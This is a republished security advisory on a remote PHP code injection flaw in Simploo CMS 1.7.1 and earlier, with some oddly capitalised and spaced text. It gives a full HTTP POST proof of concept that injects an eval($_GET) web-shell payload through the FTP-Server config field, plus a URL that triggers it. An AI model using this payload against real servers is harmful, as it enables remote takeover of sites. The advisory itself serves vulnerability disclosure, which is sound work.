Simploo CMS Community Edition-Remote PHP Co

Source: Internet
Author: User

Details

==================

Product: Simploo CMS Community Edition

Security-Risk: moderated

Remote-Exploit: yes

Vendor-URL: http://www.simploo.de/

Advisory-Status: published

Credits

==================

Discovered by: David Vieira-Kurz of MajorSecurity

Affected Products:

==================

Simploo CMS 1.7.1 and prior

Description

==================

"Simploo CMS is a content management system (CMS )."

More Details

==================

I have discovered some vulnerabilities in Simploo CMS, which can be

Exploited by malicious people to compromise a vulnerable system.

Input passed via the "FTP-Server" field when editing FTP options is not

Properly sanitised in lib/Simploo/Config/Writer/Ini. php before being

Saved to the config/custom/base. ini. php file. This can be exploited

Inject and execute arbitrary PHP code via a specially crafted parameter

Value. Successful exploitation requires "write" privileges.

Proof of Concept

==================

POST/simploo/index. php/sicore/updates/optionssave HTTP/1.1

Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de;

Rv: 1.9.2.6) Gecko/20100625 Firefox/3.6.6

Accept: application/json, text/javascript ,*/*

Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3

Accept-Encoding: gzip, deflate Accept-Charset:

ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7

Keep-Alive: 115

Proxy-Connection: keep-alive

Content-Type: application/x-www-form-urlencoded; charset = UTF-8

X-Requested-With: XMLHttpRequest Referer:

Http: // localhost/simploo/index. php/sifront/page/show/% 5 Bdraft % 5D1

Cookie: PHPSESSID = r87k31lhqmbp9707io8r6qr2p6;

Si_admin_selected = si_tree_settings_updates_options;

Si_admin_open = si_tree_settings_general % region % 2Csi_tree_settings_updates % 2Csi_tree_settings_bemodules % 2Csi_tree_settings_contentelements

Pragma: no-cache Cache cache-Control: no-cache Content-Length: 105

Ftpenable = & ftpserver = * % 2F + eval % 28% 24_GET % 5Bx % 5D % 29% 3B % 2F * & ftpuser = & ftppass = & ftppasv = 0 & ftpssl = 0 & ftpremote =

Exploit

==================

Http: // localhost/simploo/config/custom/base. ini. php? X = phpinfo % 28% 29;

Solution

==================

Edit the source code to ensure that input is properly sanitised.

Timeline

======================

2010-07-16, vulnerability identified

2010-07-17, vendor contacted and asked for pgp key

2010-07-19, vendor sent his pgp key

2010-07-20, vulnerability sent to vendor

2011-01-18, advisory published after 6 month

Use of terms

======================

Unaltered electronic reproduction of this advisory is permitted. For all

Other reproduction or publication, in printing or otherwise, contact us

For permission. Use of the advisory constitutes acceptance for use in

"As is" condition. All warranties are excluded. In no event shall

MajorSecurity be liable for any damages whatsoever including direct,

Indirect, incidental, consequential, loss of business profits or special

Damages, even if MajorSecurity has been advised of the possibility

Such damages.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.